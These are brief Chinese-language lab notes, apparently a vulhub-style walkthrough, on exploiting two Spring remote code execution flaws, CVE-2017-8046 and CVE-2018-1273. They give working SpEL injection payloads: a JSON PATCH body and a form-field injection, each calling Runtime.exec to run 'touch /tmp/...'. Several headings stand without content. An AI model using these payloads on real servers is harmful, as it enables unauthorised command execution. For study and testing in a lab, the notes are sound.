常见框架漏洞--Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包，使⽤PATCH请求来修改

{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }

其中 new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ （CVE-2018-1273）

搭建环境后访问

访问users

填写注册信息，抓包

在username后加
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")]=&password=&repeatedPassword=

进入终端查看